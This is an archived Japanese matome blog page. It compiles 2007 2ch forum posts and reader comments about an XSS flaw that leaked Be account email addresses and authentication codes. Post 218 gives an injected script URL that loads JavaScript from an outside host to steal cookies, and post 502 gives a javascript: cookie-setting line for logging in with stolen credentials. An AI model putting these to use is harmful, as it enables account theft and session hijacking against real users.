539 名前：会社員(長野県)[] 投稿日：2007/11/28(水) 00:35:11 ID:lAxML+To0 ?PLT(16073): >>452踏むやつは限定ジャンケンで船井に騙されるタイプ
541 名前：派遣の品格(広島県)[sage] 投稿日：2007/11/28(水) 00:35:18 ID:47jIAAFU0: >>452
トップ画の右の男、テラ不細工ｗｗｗｗｗｗｗｗ
547 名前：二十四の瞳(埼玉県)[sage] 投稿日：2007/11/28(水) 00:35:29 ID:P75lffUk0: >>452
無駄にうめえな
571 名前：カラオケ店勤務(愛知県)[] 投稿日：2007/11/28(水) 00:36:46 ID:QY72gd440: >>452
これはうまく心理をつかれた
574 名前：か・い・か・ん(秋田県)[] 投稿日：2007/11/28(水) 00:37:08 ID:UtYubpKX0: >>452
行ってみたけど面白かったよ
476 名前：コンビニ(富山県)[] 投稿日：2007/11/28(水) 00:30:13 ID:AdatYXFF0: このスレのアドレスこえぇｗｗｗ
493 名前：留学生(千葉県)[] 投稿日：2007/11/28(水) 00:31:46 ID:R2SWyzLe0: おお一つずつログインしてチェックしていったら、BEポイント
１万超えてるのも発見ｗこれみんなでスレ立てに利用できるな
506 名前：金田一(愛知県)[sage] 投稿日：2007/11/28(水) 00:32:28 ID:yuawg4lJ0: >>493
お前・・・・
502 名前：電話番(北海道)[] 投稿日：2007/11/28(水) 00:32:12 ID:9+V/3hbH0: メアドと認証コードでキャッシュ作成方法張っておきますね
javascript:document.cookie='DMDM=メールアドレス;expires=Thu,05-Jan-30 00:00:01 GMT;domain=2ch.net;path=/;';document.cookie='MDMD=確認コード;expires=Thu,05-Jan-30 00:00:01 GMT;domain=2ch.net;path=/;';
517 名前：ホームヘルパー(奈良県)[] 投稿日：2007/11/28(水) 00:33:23 ID:C3Kys77S0 ?2BP(6300): このスレのURL怖くて全部踏めない
535 名前：留学生(関東地方)[] 投稿日：2007/11/28(水) 00:34:56 ID:BM8w3H140: BEの仕組みがよくわからなくて手を出してなかったおれ勝ち組
558 名前：通訳(福岡県)[sage] 投稿日：2007/11/28(水) 00:36:15 ID:J8TyUx3Y0: >>535
持っててもスレ立て、スレストしか使い道ない
599 名前：書記(長屋)[] 投稿日：2007/11/28(水) 00:39:04 ID:mdQeAZJI0: 　　　　　　,..､ﾐﾐミミミ三ｼ　　. . . . `―' l ii l　(ヲ　　lミil　
　　　　　 //う{ﾐﾐミミf'"　　　_,,.,,_:.:.:.:..　 _j_　.:.:.:.　　lﾐﾘ
　　　　　 l V　}ﾐﾐミミ　　　 ',ｨでiﾝﾐ、:.:.､__, -,ｨも=､',l:l′　　　
　　　　　 'i l ,ﾉヾミミ'　　　 ´￣｀ﾞ`ラ .:. 三 f"´￣｀' lj
　　　　　ヽヽへ}ミﾐ　　　　｀二ﾆノ ,、 jl　',` ―''" ,l!　　
　　　　　　ヽ二ﾉミ'　　　　　　　 ,ィ'" 　　ﾄ、　　 ,! 　　
　　　　　　 , -fｿ!'ミ　　　　　／ `^ヽ,＿ノi　　　 ,'
　　　　　 ,/（/　{i,ﾐ'　　　　　／　 _,,...,＿,,..,、l　　 /
　　　　　/　ヽ　 lN,　　　／　 ,ィiTTTTTト, ,}　 ,/
　 , -―/　　ヽ ', ヽ　　 {　 ,/⌒'ｰ'‐'‐'‐',ﾘ l　 /　
　/　　/ 　　　ヽ'、ヽ　 l　 {,ゝ､‐r‐'ﾝ-i/ ,/ ,ｲ丶､、
"i　　 {、　　　　ヽヽ丶　丶ヾ<Zェｪｪｼ'　ﾉ ,i'lヽ、　｀ヾー-- ､
　l,　　＼　　　　ヽヽ丶、｀｀ ‐ -- ‐'"/ノ ,l　＼　　＼　　ヽ

【速報】俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見　その2★

218 名前： 40歳無職(三重県)[sage] 投稿日：2007/11/28(水) 01:09:11 ID:uuFnxPaY0: 対策されてしまった。
と言う訳で第二弾。

http://z.la/t4b0m (短縮URL)
http://qb6.2ch.net/_boo80/boo80.swx?boo80=%3Cscript%20src%3D%22http%3A%2F%2Fmoyashi%2Esosite%2Ejp%2Fxss%2Fload%2Ejs%22%3E%3C%2Fscript%3E

鱈子は修正頑張ってください。
231 名前：生き物係り(福岡県)[] 投稿日：2007/11/28(水) 01:09:50 ID:GI32Wv8G0: >>218
ログは？
238 名前：電話番(北海道)[] 投稿日：2007/11/28(水) 01:10:00 ID:9+V/3hbH0: >>218
ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
240 名前：客室乗務員(不明なsoftbank)[sage] 投稿日：2007/11/28(水) 01:10:15 ID:e2Li0LJR0: >>218
俺の数少ない串やいてんじゃねえよ殺すぞ
247 名前：男性巡査(中部地方)[sage] 投稿日：2007/11/28(水) 01:10:30 ID:MNaR50Vx0: >>218
実家に帰らないの
250 名前：朝日新聞記者(埼玉県)[sage] 投稿日：2007/11/28(水) 01:10:44 ID:kJowCIQ80: >>218
ﾜﾛﾀ
251 名前：自宅警備員(青森県)[] 投稿日：2007/11/28(水) 01:10:48 ID:OAGJS/o60: >>218
ぎゃあああああああああああ
253 名前：もんた(青森県)[] 投稿日：2007/11/28(水) 01:10:51 ID:yzIHMIqV0: >>218
　( ﾟдﾟ )
254 名前：電話番(北海道)[] 投稿日：2007/11/28(水) 01:10:51 ID:9+V/3hbH0: >>218
これはなに？
串焼きみたいだけど機能してるの？
259 名前：おたく(東京都)[] 投稿日：2007/11/28(水) 01:11:05 ID:oXgfxFTA0: >>218
さぁ、夜は長いぜ
264 名前：ニート(catv?)[sage] 投稿日：2007/11/28(水) 01:11:15 ID:IqiU4rFU0: >>218
いたちゴッコﾜﾛﾀ
265 名前：職業訓練指導員(愛知県)[sage] 投稿日：2007/11/28(水) 01:11:16 ID:Qg+BlBy80: >>218
まだやる気かｗ
277 名前：探検家(東京都)[Joseph] 投稿日：2007/11/28(水) 01:11:48 ID:Si590L8NP: >>218
人畜無害だから無問題
279 名前：一反木綿(福岡県)[] 投稿日：2007/11/28(水) 01:11:50 ID:uTVlZfaH0: >>218
三重県の40歳無職かっこいい
281 名前：おやじ(西日本)[sage] 投稿日：2007/11/28(水) 01:12:06 ID:LYos80Uj0: >>218
お前も懲りないなｗ
283 名前：ロマンチック(長野県)[] 投稿日：2007/11/28(水) 01:12:09 ID:to4KByoa0: >>218
やめろおおおおおおおおおおおおおおおおおお
287 名前： F-15K(コネチカット州)[sage] 投稿日：2007/11/28(水) 01:12:18 ID:4i8VsprSO: >>218
いいぞ徹底的にやれ
292 名前：国際審判(大阪府)[] 投稿日：2007/11/28(水) 01:12:29 ID:jWPLfN5h0: >>218
今度は串焼？
296 名前：シウマイ見習い(滋賀県)[] 投稿日：2007/11/28(水) 01:12:36 ID:oKhTsbvw0: >>218
いい加減にしろ、もっとやれ
303 名前：デパガ(埼玉県)[] 投稿日：2007/11/28(水) 01:12:53 ID:tmjjFt2M0: >>218
2chにXSS仕込んで、クッキーをhttp://moyashi.sosite.jp/xss/write.plに送ってるのか
351 名前：会社員(長野県)[] 投稿日：2007/11/28(水) 01:15:16 ID:lAxML+To0: >>218の下のURLはどんな機能なん？
398 名前：デパガ(埼玉県)[] 投稿日：2007/11/28(水) 01:18:19 ID:tmjjFt2M0: >>351
2chにXSS埋め込むURL
上はばれないように短縮してるんだな。

2chのサーバーのページのパラメータに、
2ch外部JavaScript読み込むように仕込んでる。

踏むと2chのサーバーにアクセスしたから、そのクッキーをやるけど、
外部のJavascriptも埋め込まれて、そのクッキーが別の場所＝>>1のログに
426 名前：ホームヘルパー(神奈川県)[] 投稿日：2007/11/28(水) 01:19:50 ID:g2jpvK3L0: >>398
なるほどすごくわかりやすい
見事に焼かれた
427 名前：カラオケ店勤務(愛知県)[] 投稿日：2007/11/28(水) 01:19:51 ID:QY72gd440: >>398
対策法は？
434 名前：会社員(長野県)[] 投稿日：2007/11/28(水) 01:20:33 ID:lAxML+To0: >>398
詳しくサンクス。半分くらい理解した。
442 名前：自宅警備員(愛知県)[sage] 投稿日：2007/11/28(水) 01:21:00 ID:pAa84/4g0: >>398
すげーな・・
467 名前：与党系(千葉県)[△ﾑﾛﾌｰｼｰ△] 投稿日：2007/11/28(水) 01:22:04 ID:bsiPSXH70: >>398
ふむふむ・・
な、なるほどな
519 名前：おやじ(西日本)[sage] 投稿日：2007/11/28(水) 01:25:11 ID:LYos80Uj0: あーつまり
QUERY_STRINGにスクリプトのURIを仕込んで、んでクッキーをUTF-8にエンコしてperlに送ってる、と
534 名前：空気(山口県)[sage] 投稿日：2007/11/28(水) 01:26:01 ID:uqw6hWtD0: >>519
Perlとは限りませんけどね
282 名前：味噌らーめん屋(東京都)[sage] 投稿日：2007/11/28(水) 01:12:07 ID:yO5lxWQW0: 　　　　　　　,,--'''""`ヽ'　　　-/"~　　￣`ヽ､
　　　　　／　　　　　　　ヾ''"　　　　　　　　~`ヽ
　　　／　　　　　　　_,,,...　ヽ;:　　／""ヽ　　　ヽ
　　　/　　　　　　　　　;'"　　"＼ l　/;:;;:::-'''ヽ,　　　i
　　/　　　　　　　　 /,,--:-'''''"~:::::::::::::::::::::::::::ヽ, 　 .|
　／　　　　　　　　／;:;;:::'''::::::::::::::::::::::::::::::::::::::::ヽ　ヽ
　|　　　　　　　　　|::::::::::::::::::::::::::::::::::::::::::::::::::::::::ヽ　　|
/　　　　　　　　;/　　 :::::::::::、::::::::::::::::::::::::::::::;/　ヽ　 i,
/　　　　　　　　;:;:ヽ　　　::::::::＼::::::::::::::::::::::::/　　ヽ　 i,
i　　　　　　　　　　/　）（　　　::::＼;;::::::::::::;/ ,,-'''ヽヽ　ヽ
|　　　　　　　　　　|　 ⌒　,;''"'''-;,_ ＼l,::,l/ !"　●） | 　|　おどれら俺の掲示板で何してんじゃ！！！
|　　　　　　　　　　|.　　　（ ●　　 >＞><< `"''''''　 | 　|
|　　　　　　　　　;:|　　　　 "''''''''""^　　　　＼　　 | 　|
|　　　　　　　　　ヽ.　　　　　　　　ゝ(　,-､ ,:‐､）　　| 　|
　|　　　　　　　／ヾ..　　　　　　　/　　　,--'""ヽ;;　| 　|
　|　　　　　　　　|　　　　　　　.//二二ノ""^ソ　;|　 |
..　 |　　　　　　　　`､ヽ　　　　　ﾍ`＼┼┼┼ ,!ヽ　|　 |
　　 |　　　　　　　　　ヽ＼　　　　＼"ヽ-;:,,,,,,ﾉ /　 /　|
　　　|　　　　　　　　　l　　`ｰ､_　　　＼,,,,,__,,,ノ　／ヽ./
　　　ヽ.　　　　　　　:人　　　　ヽ-、　　∴∵　 /　|ヽl
　　　/;:;:;:;;:;:;:　＿／　　`ｰ-､　　　 "'====---''",.-'"　＼ー---
　　　　　,.-'"　　＼:　　　　　＼　　　　　 .,.-''"　　　　 |
　　　　／.　　　　　＼　　　　　　　 ~＞､,.-''"　　　　　　|
288 名前：張出横綱(埼玉県)[] 投稿日：2007/11/28(水) 01:12:20 ID:9k+BLT/l0: 　　　　＿＿＿＿＿＿＿＿＿＿___
　　　／|：： ┌──────┐ ：：|
　　/.　 |：：｜　　　　　　　　｜：：|
　　|....　|：：｜　　　　　　　　　｜：：|
　　|....　|：：｜　　　　　　　　　｜：：|
　　|....　|：： └──────┘ ：：|
　　＼_｜　　　 ┌────┐　　 .|　　　　 ∧∧
　　　　￣￣￣￣￣￣￣￣￣￣￣　　　 ( 　＿)　　　　俺がURL踏まないことで
　　　　　　　　　　　　　／￣￣￣￣￣旦￣(_,　　）
　　　　　　　　　　　／　　　　　　　　　　　　　＼　｀
　　　　　　　　　　　|￣￣￣￣￣￣￣￣￣￣￣|、＿）
　　　　　　　　　　　￣|￣|￣￣￣￣￣￣|￣|￣

　　　　　|　　　　　　　　　　 .( (　|　|＼
　　　　　| )　　　　　　　　　　) ) |　|　.|
　　　　　|＿＿＿＿＿＿＿＿(__|　.＼|　　　　　　　　俺の代わりにだれか一人、beが焼かれる
　　　／― 　　∧ ∧　　――-＼≒
　　／　　　　 ( 　　　)　　　　　　　＼
　　|￣￣￣￣￣￣￣￣￣￣￣￣￣ |
　　|＿＿＿＿＿＿＿＿＿＿＿＿＿_|

　　　∧∧
　　（　･ω･）
　＿|　⊃／(＿＿_
／　└-(＿＿＿_／
￣￣￣￣￣￣￣
　　　　　　　　　　　　　　　　　　　　　　　　　　　　俺はそういうことに幸せを感じるんだ
　＜⌒／ヽ-、_＿_
／＜_/＿＿＿＿／
307 名前：美容部員(アラバマ州)[] 投稿日：2007/11/28(水) 01:13:03 ID:E6Lj2/UH0: >>288
意味が180度変わって嫌な奴になったな
377 名前：噺家(東京都)[] 投稿日：2007/11/28(水) 01:16:39 ID:BgD/tqzB0: 135 名前：ひろゆき＠どうやら管理人 ★ 投稿日： 2007/11/28(水) 01:02:52 ID:???0 ?S★(1012558)
修正。
後日対応するので消される前にログ確認しておいてください↓
ttp://z.la/t4b0m
消された後の場合は対応できない場合があります
384 名前：短大生(アラバマ州)[sage] 投稿日：2007/11/28(水) 01:17:06 ID:aRDu5swr0: >>377
これはひっかかる
408 名前：探検家(東京都)[] 投稿日：2007/11/28(水) 01:18:46 ID:rwrJ0PEYP: みんな>>377読んどけよ
424 名前：アマチュア無線技士(東京都)[sage] 投稿日：2007/11/28(水) 01:19:43 ID:Mf6FDb5R0: >>377
うぉ助かったｗ
429 名前：ジャンボタニシ(アラバマ州)[] 投稿日：2007/11/28(水) 01:20:12 ID:tscCzErO0: =hiroyuki@2ch.net 125.2.126.97

釣りこれ？ｗ
433 名前：サンダーソン(アラバマ州)[sage] 投稿日：2007/11/28(水) 01:20:32 ID:JhVb8VI40: >>429
分かり安すぎるだろｗ
453 名前：ひき肉(滋賀県)[sage] 投稿日：2007/11/28(水) 01:21:21 ID:0v2Nca8Z0: >>429
ひろゆきのBeじゃん
みりゃわかるっしょ
457 名前：通訳(アラバマ州)[] 投稿日：2007/11/28(水) 01:21:34 ID:O89V6bVR0: >>429
IPアドレス 125.2.126.97
ホスト名 ntkngw298097.kngw.nt.ftth.ppp.infoweb.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線光
都道府県神奈川県
473 名前：電話番(北海道)[] 投稿日：2007/11/28(水) 01:22:15 ID:9+V/3hbH0: >>429
なぜかログインできない
482 名前：一反木綿(福岡県)[] 投稿日：2007/11/28(水) 01:22:54 ID:uTVlZfaH0: >>429はネタか
そこいじれるみたいだしな
498 名前：空気(山口県)[sage] 投稿日：2007/11/28(水) 01:24:00 ID:uqw6hWtD0: >>482
基本的にIPアドレス以外の情報は簡単に操れる。
が、、IPアドレスもころころ変えることができるのは周知の通り。
まぁ今時の荒らしってそんな知識ないけど、モノホンのクラッカー相手だとめんどいよ
336 名前：与党系(千葉県)[] 投稿日：2007/11/28(水) 01:14:35 ID:bsiPSXH70: ニュー速beの時代終わったな

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
専用ブラウザから踏んでも引っかかるようですね。
せっかくheiwabokeアドレスでBEアカウント取っておいたのに・・・。

01:22 ★2以降を追加
01:35 またちょっと追加
01:51 トラップ要素の強いレスのURLのhを抜いた

【関連スレッド】

【速報】俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見

【速報】俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見　その2★

00:56｜２ちゃんねる｜« 前の記事｜トップページ｜次の記事 »｜

1 名前：匿名[] 投稿日：2007/11/28（水） 1:01:02 ID:

米１だったら就職探す

2 名前：匿名[] 投稿日：2007/11/28（水） 1:05:26 ID:

管理人も引っかかったのかｗ

3 名前：匿名[] 投稿日：2007/11/28（水） 1:06:39 ID:

管理人残念ｗ

4 名前：匿名[] 投稿日：2007/11/28（水） 1:08:48 ID:

よくわからんがやばそうなのはわかった

5 名前：匿名[] 投稿日：2007/11/28（水） 1:15:52 ID:

踏んでもアカウント登録してなきゃ大丈夫だろｗ

6 名前：匿名[] 投稿日：2007/11/28（水） 1:17:44 ID:

とりあえず十行で俺に教えてくれ

7 名前：匿名[] 投稿日：2007/11/28（水） 1:19:38 ID:

Be焼かれた＼(^o^)／

8 名前：匿名[] 投稿日：2007/11/28（水） 1:21:46 ID:

管理人ﾊﾞﾛｽｗ

9 名前：匿名[] 投稿日：2007/11/28（水） 1:22:00 ID:

管理人どんまいｗ

10 名前：匿名[] 投稿日：2007/11/28（水） 1:23:14 ID:

管理人は静岡かｗ

11 名前：匿名[] 投稿日：2007/11/28（水） 1:24:27 ID:

Beって何かいまだによくわかってない人間だけど
危険なＵＲＬならh抜いといたほうがいいんじゃないの？

12 名前：匿名[] 投稿日：2007/11/28（水） 1:24:47 ID:

ポインヨスレうざかったから丁度いいよ

13 名前：匿名[] 投稿日：2007/11/28（水） 1:25:09 ID:

見慣れない隠語が多すぎてさっぱりだぜ

14 名前：匿名[] 投稿日：2007/11/28（水） 1:37:58 ID:

管理人ﾜﾛﾀｗ

15 名前：匿名[] 投稿日：2007/11/28（水） 1:38:25 ID:

Ｂｅが何かすらわからん

16 名前：匿名[] 投稿日：2007/11/28（水） 1:46:47 ID:

Be + FasterFox
恐ろしい組み合わせだ
h外しておいた方がいいと思われ

17 名前：匿名[] 投稿日：2007/11/28（水） 1:49:13 ID:

くやしいのうｗｗｗくやしいのうｗｗｗ

18 名前：匿名[] 投稿日：2007/11/28（水） 1:55:04 ID:

管理人ワロタｗｗｗｗ

19 名前：匿名[] 投稿日：2007/11/28（水） 2:07:27 ID:

ｗｗｗｗｗｗｗｗ
ｗ管ｗ理ｗ人ｗ
ｗｗｗｗｗｗｗｗ

20 名前：匿名[] 投稿日：2007/11/28（水） 2:48:30 ID:

よくわからんけど
ぶっちゃけ大したこと無いんだろ？

21 名前：匿名[] 投稿日：2007/11/28（水） 3:19:17 ID:

米20
そうだよ。だから早くアドレスを踏むんだ！

22 名前：匿名[] 投稿日：2007/11/28（水） 3:29:47 ID:

管理人ｶﾜｲｿｽｗｗ

23 名前：匿名[] 投稿日：2007/11/28（水） 3:51:30 ID:

米1
絶対ハローワーク行けよ
途中で帰ってくるなよ

24 名前：匿名[] 投稿日：2007/11/28（水） 7:19:19 ID:

管理人ｶﾜｲｿｽｗ

25 名前：ざまぁｗｗｗｗｗｗｗｗ[] 投稿日：2007/11/28（水） 7:54:37 ID:

管理人が不憫過ぎて言葉が出ない

26 名前：匿名[] 投稿日：2007/11/28（水） 8:39:46 ID:

米16
それはヤバすぎるｗｗｗｗ

先読み機能とかってやばいな。
Operaとかだいじょうぶなのかな。

27 名前：匿名[] 投稿日：2007/11/28（水） 9:25:34 ID:

管理人の自虐ネタに吹いたwwwwww

28 名前：匿名[] 投稿日：2007/11/28（水） 9:56:19 ID:

つか危険なアドレスっていうんなら
リンクにしないほうがいいと思うんだけど。
間違えて踏んだらどうすんのよ

29 名前：匿名[] 投稿日：2007/11/28（水） 10:07:41 ID:

2ｃｈスレ内なら勢いで踏んだりあるだろうけど
ここでこれだけ危険だっつってんのに踏むやつもいないだろｗｗ

30 名前：匿名[] 投稿日：2007/11/28（水） 10:46:43 ID:

※29
踏むつもりはなくても、窓開け閉めしてる時とかに間違って押しちゃう可能性とかあるだろ。

31 名前：匿名[] 投稿日：2007/11/28（水） 11:24:19 ID:

確かに直鈴は危険だな。

32 名前：匿名[] 投稿日：2007/11/28（水） 12:41:03 ID:

誰か解説頼む

33 名前：匿名[] 投稿日：2007/11/28（水） 13:04:28 ID:

よくわからんがＢｅとかいうやつのアカウントハックってことか？

34 名前：匿名[] 投稿日：2007/11/28（水） 14:05:45 ID:

be持ってない俺は勝ち組

35 名前：匿名[] 投稿日：2007/11/28（水） 14:08:40 ID:

Beとかモリタポとか焼かれたとか、わけわかりませんので
どうやばいことなのか手短に教えてください。

36 名前：匿名[] 投稿日：2007/11/28（水） 16:09:41 ID:

※28
糞管理人が腹いせに他人も巻き込みたいだけ

37 名前：匿名[] 投稿日：2007/11/28（水） 16:34:25 ID:

beもちでもなんでもないから全く分からんｗｗ
VIPでコテのbeポインヨが使われたのと関係アリ？

38 名前：匿名[] 投稿日：2007/11/28（水） 16:35:44 ID:

どれだけやばいのかポケモンにたとえて説明してくれ

39 名前：匿名[] 投稿日：2007/11/28（水） 17:19:31 ID:

Beよくわからんからつかってなかった俺が踏んでもまずいの？

40 名前：匿名[] 投稿日：2007/11/28（水） 17:52:41 ID:

管理人ワロタｗｗｗ

41 名前：匿名[] 投稿日：2007/11/28（水） 18:01:30 ID:

よくわからんが管理人がh抜いてくれたおかげで助かった。。。のか？

42 名前：匿名[] 投稿日：2007/11/28（水） 18:13:45 ID:

うわああああああ間違えて踏んじまったあああああ

あ、俺BE持ってなかった

43 名前：匿名[] 投稿日：2007/11/28（水） 19:18:15 ID:

　　　　　,,--'''""`ヽ'　　　-/"~　　￣`ヽ､
　　　　　／　　　　　　　ヾ''"　　　　　　　　~`ヽ
　　　／　　　　　　　_,,,...　ヽ;:　　／""ヽ　　　ヽ
　　　/　　　　　　　　　;'"　　"＼ l　/;:;;:::-'''ヽ,　　　i
　　/　　　　　　　　 /,,--:-'''''"~:::::::::::::::::::::::::::ヽ, 　 .|
　／　　　　　　　　／;:;;:::'''::::::::::::::::::::::::::::::::::::::::ヽ　ヽ
　|　　　　　　　　　|::::::::::::::::::::::::::::::::::::::::::::::::::::::::ヽ　　|
/　　　　　　　　;/　　 :::::::::::、::::::::::::::::::::::::::::::;/　ヽ　 i,
/　　　　　　　　;:;:ヽ　　　::::::::＼::::::::::::::::::::::::/　　ヽ　 i,
i　　　　　　　　　　/　）（　　　::::＼;;::::::::::::;/ ,,-'''ヽヽ　ヽ
|　　　　　　　　　　|　 ⌒　,;''"'''-;,_ ＼l,::,l/ !"　●） | 　|　おどれら俺の掲示板で何してんじゃ！！！
|　　　　　　　　　　|.　　　（ ●　　 >＞><< `"''''''　 | 　|
|　　　　　　　　　;:|　　　　 "''''''''""^　　　　＼　　 | 　|
|　　　　　　　　　ヽ.　　　　　　　　ゝ(　,-､ ,:‐､）　　| 　|
　|　　　　　　　／ヾ..　　　　　　　/　　　,--'""ヽ;;　| 　|
　|　　　　　　　　|　　　　　　　.//二二ノ""^ソ　;|　 |
..　 |　　　　　　　　`､ヽ　　　　　ﾍ`＼┼┼┼ ,!ヽ　|　 |
　　 |　　　　　　　　　ヽ＼　　　　＼"ヽ-;:,,,,,,ﾉ /　 /　|
　　　|　　　　　　　　　l　　`ｰ､_　　　＼,,,,,__,,,ノ　／ヽ./
　　　ヽ.　　　　　　　:人　　　　ヽ-、　　∴∵　 /　|ヽl
　　　/;:;:;:;;:;:;:　＿／　　`ｰ-､　　　 "'====---''",.-'"　＼ー---
　　　　　,.-'"　　＼:　　　　　＼　　　　　 .,.-''"　　　　 |
　　　　／.　　　　　＼　　　　　　　 ~＞､,.-''"　　　　　　|

44 名前：匿名[] 投稿日：2007/11/28（水） 19:36:43 ID:

危ないっつってんだから、俺は一切踏まない
つかなんのことかさっぱりだが、これは情報弱者というべきか？

45 名前：匿名[] 投稿日：2007/11/28（水） 22:10:18 ID:

Ｂｅってなんなのか分からない。
みんなすごいな。

46 名前：匿名[] 投稿日：2007/11/28（水） 23:53:16 ID:

かｗｗｗかんｒｗｗｗｗ管ｗｗｗかｗｗｗｗ管理人さぁんｗｗｗｗｗｗｗｗｗｗｗｗｗ

47 名前：匿名[] 投稿日：2007/11/29（木） 0:35:00 ID:

管理人ｗｗｗｗｗｗｗなにやってんのｗｗｗｗｗｗｗｗｗｗ

48 名前：匿名[] 投稿日：2007/11/29（木） 0:45:30 ID:

管理人は2chねらーの鑑だなｗｗｗｗｗ

49 名前：匿名[] 投稿日：2007/11/29（木） 0:51:52 ID:

ねらーとしてよくやったｗｗｗｗ
今回は乙

50 名前：匿名[] 投稿日：2007/11/29（木） 14:45:19 ID:

知識面で、このスレと絶望的な差を感じるぜ( ﾟДﾟ)

51 名前：匿名[] 投稿日：2007/11/29（木） 15:54:15 ID:

>>1に要するにアクセスすると
http://ja.wikipedia.org/wiki/Be_%282%E3%81%A1%E3%82%83%E3%82%93%E3%81%AD%E3%82%8B%E3%82%AB%E3%83%86%E3%82%B4%E3%83%AA%29
のIDが引き抜かれるの？

52 名前：匿名[] 投稿日：2007/12/01（土） 0:33:51 ID:

Beとか良く分からんが取り合えず不正アクセスになりそうでリンク踏めないｗ

53 名前：匿名[] 投稿日：2007/12/01（土） 2:54:44 ID:

管理人さすがだぜ…

54 名前：匿名[] 投稿日：2007/12/01（土） 17:00:46 ID:

ＢＥって何だｋｗｓｋ

55 名前：匿名[] 投稿日：2007/12/02（日） 15:02:36 ID:

※1
応援してるぞ。

半角数字を、米・※・＃・＊・*のあとに入れることによりコメントに、
>>のあとに入れることにより本文にレスをすることができます。

トラックバック

このエントリーのトラックバックURL:

http://www.heiwaboke.com/cgi/mt/mt-tb.cgi/1689

» ウェブカメラのうわさ
【送信元】　★ネット情報背負い投げ
「タグ」や「フォルダ」でフィードを整理しよう・ウェブサービス虎の巻その七日本経済新聞フィードリーダーを使い始めると、その便利さから登録するフィードが多く... [詳しくはこちら]
トラックバック時刻： 2007年12月03日 22:17

暇つぶし

簡易２ちゃんねるビューア

自宅警備記録

オセロゲーム

textAA

カテゴリー

( ；＾ω＾)＜へいわぼけ
ＴＯＰ　アーカイブ　お国と政治　痛い　社会・生活　調査・雑学　ゲーム・ホビー　漫画・アニメ　 IT 　朝鮮半島　２ちゃんねる　ネタ　このブログについて

【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見

コメント

トラックバック

【速報】俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見